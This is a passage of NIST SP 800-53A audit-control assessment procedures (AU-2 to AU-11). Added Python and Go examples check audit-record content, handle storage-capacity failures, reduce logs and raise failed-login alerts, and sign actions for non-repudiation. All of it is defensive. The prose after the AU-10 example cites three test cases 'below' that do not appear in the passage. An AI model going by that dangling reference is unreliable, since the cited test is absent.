Supplemental Guidance: The purpose of this control is to identify important events which need to be audited as significant and relevant to the security of the information system. The organization specifies which information system components carry out auditing activities. Auditing activity can affect information system performance. Therefore, the organization decides, based upon a risk assessment, which events require auditing on a continuous basis and which events require auditing in response to specific situations. Audit records can be generated at various levels of abstraction, including at the packet level as information traverses the network. Selecting the right level of abstraction for audit record generation is a critical aspect of an audit capability and can facilitate the identification of root causes to problems. Additionally, the security audit function is coordinated with the network health and status monitoring function to enhance the mutual support between the two functions by the selection of information to be recorded by each function. The checklists and configuration guides at http://csrc.nist.gov/pcig/cig.html provide recommended lists of auditable events. The organization defines auditable events that are adequate to support after-the-fact investigations of security incidents. NIST Special Publication 800-92 provides guidance on computer security log management.
AU-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, information system auditable events;
(ii) the organization-defined auditable events include those deemed by the organization to be adequate to support after-the-fact investigations of security incidents;
(iii) the information system generates audit records for the organization-defined auditable events;
(iv) the organization specifies which information system components carry out auditing activities; and
(v) the organization decides, based upon a risk assessment, which events require auditing on a continuous basis and which events require auditing in response to specific situations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing information system auditing of organization-defined auditable events]. (H)
AU-2(1) AUDITABLE EVENTS
Control Enhancement:
The information system provides the capability to compile audit records from multiple components throughout the system into a systemwide (logical or physical), time-correlated audit trail.
AU-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system has the capability to compile audit records from more than one component within the information system into a systemwide (logical or physical), time-correlated audit trail.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; information system design documentation; information system configuration settings and associated documentation; list of organization-defined auditable events; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing a system-wide auditing capability]. (H)
AU-2(2) AUDITABLE EVENTS
Control Enhancement:
The information system provides the capability to manage the selection of events to be audited by individual components of the system.
AU-2(2).1 ASSESSMENT OBJECTIVE:
Determine if the information system provides the capability to manage the selection of events to be audited by individual components of the system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; information system design documentation; information system configuration settings and associated documentation; list of organization-defined auditable events; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing information system auditing for the specified components of the information system]. (H)
AU-2(3) AUDITABLE EVENTS
Control Enhancement:
The organization periodically reviews and updates the list of organization-defined auditable events.
AU-2(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization periodically reviews and updates the list of organization-defined auditable events.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing auditable events; list of organization-defined auditable events; information system audit records; information system incident reports; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with auditing and accountability responsibilities]. (H)


ASSESSMENT PROCEDURE
AU-3 CONTENT OF AUDIT RECORDS
Control: The information system produces audit records that contain sufficient information to establish what events occurred, the sources of the events, and the outcomes of the events.
Supplemental Guidance: Audit record content includes, for most audit records: (i) date and time of the event; (ii) the component of the information system (e.g., software component, hardware component) where the event occurred; (iii) type of event; (iv) user/subject identity; and (v) the outcome (success or failure) of the event. NIST Special Publication 800-92 provides guidance on computer security log management.
AU-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the information system audit records capture sufficient information to establish what events occurred;
(ii) the information system audit records capture sufficient information to establish the sources of the events; and
(iii) the information system audit records capture sufficient information to establish the outcomes of the events.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing content of audit records; list of organization-defined auditable events; information system audit records; information system incident reports; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing information system auditing of auditable events]. (H)
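An assessor testing AU-3.1 needs to look at real records, not just the policy, and decide whether each one establishes what happened, where, by whom, and with what outcome. The following script is an added example, not part of SP 800-53A and not any product's code: it checks records against the five content elements listed in the supplemental guidance. The key=value record format, the field names, and the sample records are assumptions constructed for the illustration.

```python
"""Check audit records for the AU-3 content elements.

Added example for assessing AU-3 (not part of SP 800-53A). It takes audit
records in a simple key=value line format (a constructed format assumed
here for illustration) and reports which of the five elements named in the
supplemental guidance each record lacks: date/time, component, event type,
subject identity, outcome.
"""
import re
from datetime import datetime

# Elements the AU-3 supplemental guidance expects "for most audit records",
# mapped to the key names assumed in the constructed record format.
REQUIRED_FIELDS = {
    "timestamp": "date and time of the event",
    "component": "component where the event occurred",
    "event": "type of event",
    "subject": "user/subject identity",
    "outcome": "outcome (success or failure)",
}

# Constructed sample records (not real logs). Record 3 lacks a subject;
# record 4 has an unparseable timestamp and an unrecognised outcome.
SAMPLE_RECORDS = """\
timestamp=2008-06-30T14:03:11Z component=sshd event=login subject=alice outcome=success
timestamp=2008-06-30T14:03:40Z component=sudo event=privilege_escalation subject=alice outcome=failure
timestamp=2008-06-30T14:04:02Z component=httpd event=config_change outcome=success
timestamp=yesterday component=kernel event=module_load subject=root outcome=maybe
"""

TOKEN_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Parse one key=value audit line into a dict; quoted values allowed."""
    return {k: v.strip('"') for k, v in TOKEN_RE.findall(line)}


def check_record(rec):
    """Return the list of AU-3 deficiencies for one parsed record.

    A field is deficient if absent or empty. The timestamp must also parse
    (ISO 8601 UTC assumed) and the outcome must be a recognised
    success/failure value: a value that cannot be interpreted does not
    "establish" the fact the control asks for.
    """
    problems = []
    for key, desc in REQUIRED_FIELDS.items():
        if not rec.get(key):
            problems.append(f"missing {desc}")
    ts = rec.get("timestamp")
    if ts:
        try:
            datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        except ValueError:
            problems.append("unparseable date and time")
    outcome = rec.get("outcome")
    if outcome and outcome.lower() not in {"success", "failure"}:
        problems.append(f"unrecognised outcome {outcome!r}")
    return problems


def assess(text):
    """Check every non-empty line; return {line_number: [problems]} for the
    records that fail, so the assessor can cite the exact record."""
    findings = {}
    for n, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        problems = check_record(parse_record(line))
        if problems:
            findings[n] = problems
    return findings


if __name__ == "__main__":
    for n, probs in assess(SAMPLE_RECORDS).items():
        print(f"record {n}: " + "; ".join(probs))
```

Run against a sample pulled from the system under assessment, the findings dictionary gives the evidence for objectives (i) through (iii): a record without a subject cannot establish the source of the event, and one without a parseable time or a recognisable outcome cannot establish what occurred or how it ended.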
AU-3(1) CONTENT OF AUDIT RECORDS
Control Enhancement:
The information system provides the capability to include additional, more detailed information in the audit records for audit events identified by type, location, or subject.
AU-3(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system provides the capability to include additional, more detailed information in the audit records for audit events identified by type, location, or subject.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing content of audit records; information system design documentation; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Information system audit capability to include more detailed information in audit records for audit events identified by type, location, or subject]. (H)
AU-3(2) CONTENT OF AUDIT RECORDS
Control Enhancement:
The information system provides the capability to centrally manage the content of audit records generated by individual components throughout the system.
AU-3(2).1 ASSESSMENT OBJECTIVE:
Determine if the information system provides the capability to centrally manage the content of audit records generated from multiple components throughout the system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing content of audit records; information system design documentation; list of organization-defined auditable events; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing centralized management of audit record content]. (H)


ASSESSMENT PROCEDURE
AU-4 AUDIT STORAGE CAPACITY
Control: The organization allocates sufficient audit record storage capacity and configures auditing to reduce the likelihood of such capacity being exceeded.
Supplemental Guidance: The organization provides sufficient audit storage capacity, taking into account the auditing to be performed and the online audit processing requirements. Related security controls: AU-2, AU-5, AU-6, AU-7, SI-4.
AU-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization allocates sufficient audit record storage capacity; and
(ii) the organization configures auditing to reduce the likelihood of audit record storage capacity being exceeded.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit storage capacity; information system design documentation; organization-defined audit record storage capacity for information system components that store audit records; list of organization-defined auditable events; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
AU-5 RESPONSE TO AUDIT PROCESSING FAILURES
Control: The information system alerts appropriate organizational officials in the event of an audit processing failure and takes the following additional actions: [Assignment: organization-defined actions to be taken (e.g., shut down information system, overwrite oldest audit records, stop generating audit records)].
Supplemental Guidance: Audit processing failures include, for example, software/hardware errors, failures in the audit capturing mechanisms, and audit storage capacity being reached or exceeded. Related security control: AU-4.
AU-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, actions to be taken in the event of an audit processing failure;
(ii) the organization defines in the security plan, explicitly or by reference, personnel to be notified in case of an audit processing failure; and
(iii) the information system alerts appropriate organizational officials and takes any additional organization-defined actions in the event of an audit failure, to include audit storage capacity being reached or exceeded.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing response to audit processing failures; information system design documentation; security plan; information system configuration settings and associated documentation; list of personnel to be notified in case of an audit processing failure; information system audit records; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing information system response to audit processing failures]. (H)
AU-5(1) RESPONSE TO AUDIT PROCESSING FAILURES
Control Enhancement:
The information system provides a warning when allocated audit record storage volume reaches [Assignment: organization-defined percentage of maximum audit record storage capacity].
AU-5(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the percentage of maximum audit record storage capacity that, if reached, requires a warning to be provided; and
(ii) the information system provides a warning when the allocated audit record storage volume reaches the organization-defined percentage of maximum audit record storage capacity.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing response to audit processing failures; information system design documentation; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing audit storage limit warnings]. (H)
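The AU-5 and AU-5(1) test objects are "automated mechanisms", so it helps to see the behaviour the assessor is looking for in one place: a warning when usage reaches the organization-defined percentage, an alert on failure, and then the organization-defined action (the control text names shutting down, overwriting the oldest records, or stopping audit generation). The class below is an added illustration, not code from NIST or any product. Capacity is counted in records rather than bytes, the capacity, warning percentage and failure action are assumed security-plan values, and alerts are collected in a list rather than sent to officials.

```python
"""Audit storage monitor with AU-5 failure actions and the AU-5(1) warning.

Added illustration for SP 800-53A AU-5 / AU-5(1); not code from NIST or
from any product. Capacity, warning percentage and failure action are
assumed organization-defined values that would come from the security
plan; alerts are collected in a list instead of being sent to officials.
"""
from collections import deque

# The example failure actions the AU-5 control text names.
OVERWRITE_OLDEST = "overwrite_oldest"
STOP_GENERATING = "stop_generating"
SHUTDOWN = "shutdown"


class AuditStorageFull(Exception):
    """Raised when the failure action is SHUTDOWN; the caller halts the system."""


class AuditStore:
    def __init__(self, capacity, warn_percent, failure_action):
        if capacity < 1 or not 0 < warn_percent <= 100:
            raise ValueError("capacity must be >= 1 and warn_percent in (0, 100]")
        if failure_action not in (OVERWRITE_OLDEST, STOP_GENERATING, SHUTDOWN):
            raise ValueError(f"unknown failure action {failure_action!r}")
        self.capacity = capacity          # records, for simplicity (bytes in practice)
        self.warn_percent = warn_percent
        self.failure_action = failure_action
        self.records = deque()
        self.alerts = []                  # messages that would go to officials
        self.lost = 0                     # records overwritten or never stored
        self._warned = False              # AU-5(1) warning fires once per crossing

    def percent_used(self):
        return 100.0 * len(self.records) / self.capacity

    def append(self, record):
        """Store one audit record; return True if it was kept."""
        if len(self.records) >= self.capacity:
            kept = self._handle_failure(record)
        else:
            self.records.append(record)
            kept = True
        # AU-5(1): warn when usage reaches the organization-defined percentage,
        # and re-arm the warning once usage has dropped below it again.
        if self.percent_used() >= self.warn_percent:
            if not self._warned:
                self.alerts.append(
                    f"WARNING: audit storage at {self.percent_used():.0f}% of capacity")
                self._warned = True
        else:
            self._warned = False
        return kept

    def purge(self, n):
        """Remove the n oldest records (e.g. after offloading them to archive)."""
        for _ in range(min(n, len(self.records))):
            self.records.popleft()

    def _handle_failure(self, record):
        # AU-5: alert first, then take the organization-defined action.
        self.alerts.append("FAILURE: audit storage capacity exceeded")
        if self.failure_action == OVERWRITE_OLDEST:
            self.records.popleft()
            self.records.append(record)
            self.lost += 1
            return True
        if self.failure_action == STOP_GENERATING:
            self.lost += 1
            return False
        raise AuditStorageFull("audit storage full; shutting down per policy")
```

The point an assessor should take from the three branches is that every failure action loses something: overwriting discards the oldest evidence, stopping discards the newest, and shutting down trades availability for completeness of the audit trail. Which loss is acceptable is the decision the security plan has to record under objective (i), and the warning threshold in AU-5(1) exists so that operators can offload records before any of those branches is reached.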
AU-5(2) RESPONSE TO AUDIT PROCESSING FAILURES
Control Enhancement:
The information system provides a real-time alert when the following audit failure events occur: [Assignment: organization-defined audit failure events requiring real-time alerts].
AU-5(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, audit failure events requiring real-time alerts; and
(ii) the information system provides a real-time alert when organization-defined audit failure events occur.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing response to audit processing failures; information system design documentation; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing real-time audit alerts]. (H)


ASSESSMENT PROCEDURE
AU-6 AUDIT MONITORING, ANALYSIS, AND REPORTING
Control: The organization regularly reviews/analyzes information system audit records for indications of inappropriate or unusual activity, investigates suspicious activity or suspected violations, reports findings to appropriate officials, and takes necessary actions.
Supplemental Guidance: Organizations increase the level of audit monitoring and analysis activity within the information system whenever there is an indication of increased risk to organizational operations, organizational assets, or individuals based on law enforcement information, intelligence information, or other credible sources of information.
AU-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization regularly reviews/analyzes audit records for indications of inappropriate or unusual activity;
(ii) the organization investigates suspicious activity or suspected violations;
(iii) the organization reports findings of inappropriate/unusual activities, suspicious behavior, or suspected violations to appropriate officials; and
(iv) the organization takes necessary actions in response to the reviews/analyses of audit records.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; reports of audit findings; records of actions taken in response to reviews/analyses of audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Information system audit monitoring, analysis, and reporting capability]. (H)
AU-6.2 ASSESSMENT OBJECTIVE:
Determine if the organization increases the level of audit monitoring and analysis activity whenever there is increased risk to organizational operations and assets, or to individuals, based on information from law enforcement organizations, the intelligence community, or other credible sources.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; threat information documentation from law enforcement, intelligence community, or other sources; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (H)
AU-6(1) AUDIT MONITORING, ANALYSIS, AND REPORTING
Control Enhancement:
The organization employs automated mechanisms to integrate audit monitoring, analysis, and reporting into an overall process for investigation and response to suspicious activities.
AU-6(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to integrate audit monitoring, analysis, and reporting into an overall process for investigation and response to suspicious activities.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (H)
Test: [SELECT FROM: Automated mechanisms integrating audit monitoring, analysis, and reporting into an organizational process for investigation and response to suspicious activities]. (H)
AU-6(2) AUDIT MONITORING, ANALYSIS, AND REPORTING
Control Enhancement:
The organization employs automated mechanisms to alert security personnel of the following inappropriate or unusual activities with security implications: [Assignment: organization-defined list of inappropriate or unusual activities that are to result in alerts].
AU-6(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, inappropriate or unusual activities with security implications; and
(ii) the organization employs automated mechanisms to alert security personnel of the occurrence of any organization-defined inappropriate or unusual activities with security implications.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit monitoring, analysis, and reporting; information system design documentation; information system configuration settings and associated documentation; security plan; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing security alerts]. (M) (H)


ASSESSMENT PROCEDURE
AU-7 AUDIT REDUCTION AND REPORT GENERATION
Control: The information system provides an audit reduction and report generation capability.
Supplemental Guidance: Audit reduction, review, and reporting tools support after-the-fact investigations of security incidents without altering original audit records.
AU-7.1 ASSESSMENT OBJECTIVE:
Determine if the information system provides audit reduction and report generation tools that support after-the-fact investigations of security incidents without altering original audit records.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit reduction and report generation; information system design documentation; audit reduction, review, and reporting tools; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system audit monitoring, analysis, and reporting responsibilities]. (M) (H)
Test: [SELECT FROM: Audit reduction and report generation capability]. (M) (H)
AU-7(1) AUDIT REDUCTION AND REPORT GENERATION
Control Enhancement:
The information system provides the capability to automatically process audit records for events of interest based upon selectable event criteria.
AU-7(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system provides the capability to automatically process audit records for events of interest based upon selectable event criteria.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit reduction and report generation; information system design documentation; information system configuration settings and associated documentation; audit reduction, review, and reporting tools; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Audit reduction and report generation capability]. (H)
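The AU-6(2) alerting enhancement and the AU-7/AU-7(1) audit reduction capability rest on the same mechanism: read the audit trail, select records by criteria, summarize them for a report, and raise alerts for organization-defined activities, all without modifying the original records. The Go program below is an added illustration written for this page; it is not code from NIST, FISMApedia or any assessed system. The record layout, the event and user names, the sample records and the failed-login rule are constructed assumptions, and the alert rule assumes records arrive in time order.

```go
package main
import (
	"fmt"
	"strings"
	"time"
)

// AuditRecord is one parsed record; the layout "time user event outcome source" is an assumption.
type AuditRecord struct {
	Time                         time.Time
	User, Event, Outcome, Source string
}

// sampleAudit is constructed data, not records from any real system; it is in time order.
const sampleAudit = `2008-07-01T08:00:01Z alice LOGIN SUCCESS 10.0.0.5
2008-07-01T08:00:07Z bob LOGIN FAILURE 10.0.0.9
2008-07-01T08:00:09Z bob LOGIN FAILURE 10.0.0.9
2008-07-01T08:00:12Z bob LOGIN FAILURE 10.0.0.9
2008-07-01T08:06:30Z carol PRIV_ESCALATION SUCCESS 10.0.0.7`

// ParseAudit reads the trail; a malformed line is an error, never a silent drop.
func ParseAudit(raw string) ([]AuditRecord, error) {
	var out []AuditRecord
	for i, line := range strings.Split(strings.TrimSpace(raw), "\n") {
		f := strings.Fields(line)
		if len(f) != 5 {
			return nil, fmt.Errorf("line %d: expected 5 fields, got %d", i+1, len(f))
		}
		t, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			return nil, fmt.Errorf("line %d: bad time stamp: %w", i+1, err)
		}
		out = append(out, AuditRecord{t, f[1], f[2], f[3], f[4]})
	}
	return out, nil
}

// Criteria is the selectable event criteria of AU-7(1); an empty field matches anything.
type Criteria struct {
	User, Event, Outcome string
}

// Reduce returns copies of the matching records; the originals are never modified (AU-7).
func Reduce(records []AuditRecord, c Criteria) []AuditRecord {
	var out []AuditRecord
	for _, r := range records {
		if (c.User == "" || c.User == r.User) && (c.Event == "" || c.Event == r.Event) &&
			(c.Outcome == "" || c.Outcome == r.Outcome) {
			out = append(out, r)
		}
	}
	return out
}

// Report counts records by "EVENT/OUTCOME", the summary part of a generated report.
func Report(records []AuditRecord) map[string]int {
	counts := map[string]int{}
	for _, r := range records {
		counts[r.Event+"/"+r.Outcome]++
	}
	return counts
}

// AlertRule is one organization-defined inappropriate activity (AU-6(2)):
// Threshold or more matching events by one user within Window.
type AlertRule struct {
	Event, Outcome string
	Threshold      int
	Window         time.Duration
}

// FailedLoginRule is a constructed example rule, not any organization's actual list.
var FailedLoginRule = AlertRule{Event: "LOGIN", Outcome: "FAILURE", Threshold: 3, Window: time.Minute}

// Alerts slides a per-user window over time-ordered records and names each user at most once.
func (a AlertRule) Alerts(records []AuditRecord) []string {
	recent, alerted, alerts := map[string][]time.Time{}, map[string]bool{}, []string{}
	for _, r := range records {
		if r.Event != a.Event || r.Outcome != a.Outcome {
			continue
		}
		ts := append(recent[r.User], r.Time)
		for r.Time.Sub(ts[0]) > a.Window {
			ts = ts[1:] // expire events older than the window
		}
		recent[r.User] = ts
		if len(ts) >= a.Threshold && !alerted[r.User] {
			alerted[r.User] = true
			alerts = append(alerts, fmt.Sprintf("%s: %d %s/%s events within %s", r.User, len(ts), a.Event, a.Outcome, a.Window))
		}
	}
	return alerts
}

func main() {
	recs, err := ParseAudit(sampleAudit)
	if err != nil {
		panic(err)
	}
	fmt.Println(Reduce(recs, Criteria{Outcome: "FAILURE"}), Report(recs), FailedLoginRule.Alerts(recs))
}
```

When testing this kind of capability, the checks an assessor cares about are visible here: a selection with empty criteria returns every record, the source slice is unchanged after reduction, and a narrower alert window suppresses the alert because the three failures no longer fall inside it.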


ASSESSMENT PROCEDURE
AU-8 TIME STAMPS
Control: The information system provides time stamps for use in audit record generation.
Supplemental Guidance: Time stamps (including date and time) of audit records are generated using internal system clocks.
AU-8.1 ASSESSMENT OBJECTIVE:
Determine if the information system provides time stamps in audit records.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing time stamp generation; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing time stamp generation]. (M) (H)
AU-8(1) TIME STAMPS
Control Enhancement:
The organization synchronizes internal information system clocks [Assignment: organization-defined frequency].
AU-8(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of internal clock synchronization for the information system; and
(ii) the organization synchronizes internal information system clocks periodically in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing time stamp generation; security plan; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing internal information system clock synchronization]. (H)


ASSESSMENT PROCEDURE
AU-9 PROTECTION OF AUDIT INFORMATION
Control: The information system protects audit information and audit tools from unauthorized access, modification, and deletion.
Supplemental Guidance: Audit information includes all information (e.g., audit records, audit settings, and audit reports) needed to successfully audit information system activity.
AU-9.1 ASSESSMENT OBJECTIVE:
Determine if the information system protects audit information and audit tools from unauthorized access, modification, and deletion.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing protection of audit information; access control policy and procedures; information system design documentation; information system configuration settings and associated documentation; information system audit records; audit tools; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing audit information protection]. (H)
AU-9(1) PROTECTION OF AUDIT INFORMATION
Control Enhancement:
The information system produces audit records on hardware-enforced, write-once media.
AU-9(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system produces audit information on hardware-enforced, write-once media.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing protection of audit information; access control policy and procedures; information system design documentation; information system hardware settings; information system configuration settings and associated documentation; information system audit records; other relevant documents or records].
Test: [SELECT FROM: Media storage devices].


ASSESSMENT PROCEDURE
AU-10 NON-REPUDIATION
Control: The information system provides the capability to determine whether a given individual took a particular action.
Supplemental Guidance: Examples of particular actions taken by individuals include creating information, sending a message, approving information (e.g., indicating concurrence or signing a contract), and receiving a message. Non-repudiation protects against later false claims by an individual of not having taken a specific action. Non-repudiation protects individuals against later claims by an author of not having authored a particular document, a sender of not having transmitted a message, a receiver of not having received a message, or a signatory of not having signed a document. Non-repudiation services can be used to determine if information originated from an individual, or if an individual took specific actions (e.g., sending an email, signing a contract, approving a procurement request) or received specific information. Non-repudiation services are obtained by employing various techniques or mechanisms (e.g., digital signatures, digital message receipts, time stamps).
AU-10.1 ASSESSMENT OBJECTIVE:
Determine if the information system provides the capability to determine whether a given individual took a particular action (e.g., created information, sent a message, approved information [e.g., to indicate concurrence or sign a contract] or received a message).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing non-repudiation; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing non-repudiation capability].
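The supplemental guidance names digital signatures, digital message receipts and time stamps as the mechanisms behind non-repudiation. The Go program below is an added illustration written for this page, not code from NIST or any assessed system, of the first two: an action record (who, what, which object, when) is signed with the acting individual's private key, and a verifier holding only enrolled public keys can later decide whether that individual took exactly that action. The Action fields, the separator used for the canonical encoding, the Registry type and the names and values are all constructed assumptions; key enrollment is assumed to happen out of band.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
	"strings"
	"time"
)

// Action is the record an individual attests to: who did what to which object, and when.
// The field set and the separator below are assumptions made for this example.
type Action struct {
	Actor, Kind, Subject string // e.g. "alice", "APPROVE", "contract-42" (constructed values)
	When                 time.Time
}

// canonical fixes the byte encoding so that signer and verifier operate on identical bytes.
func (a Action) canonical() []byte {
	return []byte(strings.Join([]string{a.Actor, a.Kind, a.Subject, a.When.UTC().Format(time.RFC3339)}, "\x1f"))
}

// SignedAction binds an Action to the actor's private signing key.
type SignedAction struct {
	Action    Action
	Signature []byte
}

// Registry holds each individual's public key; it assumes keys were enrolled
// out of band (in practice via a PKI), which is what makes the binding attributable.
type Registry map[string]ed25519.PublicKey

// Enroll generates a key pair for actor and publishes only the public half.
func Enroll(reg Registry, actor string) (ed25519.PrivateKey, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	reg[actor] = pub
	return priv, nil
}

// Sign is what the individual does when taking the action (or, for a message
// receipt, when receiving it). Only the holder of priv can produce this
// signature; a shared-secret MAC would not do, because the verifier could
// forge it too and the individual could plausibly deny the record.
func Sign(priv ed25519.PrivateKey, a Action) SignedAction {
	return SignedAction{Action: a, Signature: ed25519.Sign(priv, a.canonical())}
}

// Verify answers the AU-10 question: did the named individual take this exact action?
func Verify(reg Registry, s SignedAction) error {
	pub, ok := reg[s.Action.Actor]
	if !ok {
		return fmt.Errorf("no enrolled key for %q", s.Action.Actor)
	}
	if !ed25519.Verify(pub, s.Action.canonical(), s.Signature) {
		return errors.New("signature invalid: record altered or not signed by the named actor")
	}
	return nil
}

func main() {
	reg := Registry{}
	alice, err := Enroll(reg, "alice")
	if err != nil {
		panic(err)
	}
	approved := Sign(alice, Action{"alice", "APPROVE", "contract-42", time.Date(2008, 7, 1, 9, 0, 0, 0, time.UTC)})
	fmt.Println("genuine record:", Verify(reg, approved))
	approved.Action.Subject = "contract-99" // a later claim that something else was approved
	fmt.Println("altered record:", Verify(reg, approved))
}
```

The time stamp inside the record is asserted by the signer, so on its own it only proves what time the signer claimed; binding the record to trusted time is the separate time-stamp mechanism the guidance lists, which in practice relies on the synchronized clocks of AU-8 or an independent time-stamping service. An assessor testing a non-repudiation capability would expect the last three cases in the test below to fail verification: an altered record, a record naming one individual but signed by another, and a record from an actor with no enrolled key.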


ASSESSMENT PROCEDURE
AU-11 AUDIT RECORD RETENTION
Control: The organization retains audit records for [Assignment: organization-defined time period] to provide support for after-the-fact investigations of security incidents and to meet regulatory and organizational information retention requirements.
Supplemental Guidance: The organization retains audit records until it is determined that they are no longer needed for administrative, legal, audit, or other operational purposes. This includes, for example, retention and availability of audit records relative to Freedom of Information Act (FOIA) requests, subpoena, and law enforcement actions. Standard categorizations of audit records relative to such types of actions and standard response processes for each type of action are developed and disseminated. NIST Special Publication 800-61 provides guidance on computer security incident handling and audit record retention.
AU-11.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the retention period for audit records generated by the information system; and
(ii) the organization retains information system audit records for the organization-defined time period to provide support for after-the-fact investigations of security incidents and to meet regulatory and organizational information retention requirements.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Audit and accountability policy; procedures addressing audit record retention; organization-defined retention period for audit records; information system audit records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system audit record retention responsibilities]. (H)


FAMILY: Certification, Accreditation, and Security Assessments


ASSESSMENT PROCEDURE
CA-1 CERTIFICATION, ACCREDITATION, AND SECURITY ASSESSMENT POLICIES AND PROCEDURES
